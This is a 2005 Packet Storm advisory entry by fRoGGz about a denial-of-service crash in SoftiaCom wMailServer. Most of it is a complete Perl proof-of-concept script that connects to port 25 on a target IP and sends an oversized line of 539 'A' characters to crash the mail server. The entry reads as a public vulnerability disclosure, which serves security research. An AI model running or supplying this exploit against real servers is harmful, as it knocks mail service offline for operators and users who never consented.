wms_poc.pl.txt

2005-07-13T00:00:00
ID PACKETSTORM:38625
Type packetstorm
Reporter fRoGGz
Modified 2005-07-13T00:00:00

Description

                                        
                                            `SoftiaCom MailServer v2.0 - Denial Of Service  
  
Software: wMailServer  
Corporation: SoftiaCom Software  
Version: v1.0 (v2.0 is the same...)  
Vulnerability: Denial of Service  
  
  
------------------------------------------  
  
  
BACKGROUND  
__________  
  
  
SoftiaCom design and build software utilities in communication and network server.  
  
WMailserver is an internet email server able to listin in the appropriate mail port  
to fetch incoming emails from the net. You can add users and manage them, avoid spam.  
  
  
Source: www.softiacom.com  
  
  
  
Proof of Concept  
________________  
  
  
#!/usr/bin/perl  
# -----------------------------------------------------  
# Vulnerability: Denial Of Service - Crash  
# Discovered on: July 9, 2005  
# Coded by: fRoGGz - SecuBox Labs  
# Severity: Normal  
# -----------------------------------------------------  
  
$boulet = $ARGV[0];  
  
use IO::Socket;  
print "\n\nSoftiaCom Software - wMailServer v1.0\r\n";  
print "Denial Of Service - Crash Vulnerability\r\n";  
print "---------------------------------------------\r\n";  
print "Discovered & coded by fRoGGz - SecuBox Labs\r\n\n";  
if(!$ARGV[0]) {  
die "Utilisation: ./wms_poc.pl <ip>\n";  
}  
  
print "[ ] Connexion sur $boulet\n";  
my($suckette) = "";  
if ($suckette = IO::Socket::INET->new(PeerAddr => $boulet,PeerPort => "25",Proto => "TCP"))  
{  
print $suckette " " . "\x41" x 539 . "\r\n";  
print "[ ] Emission du paquet malicieux ...\n";  
sleep 2;  
close $suckette;  
print "[ ] Mission terminée !\n\n";  
}  
else  
{  
print "[-] Impossible de se connecter sur $boulet\n";  
}  
  
  
`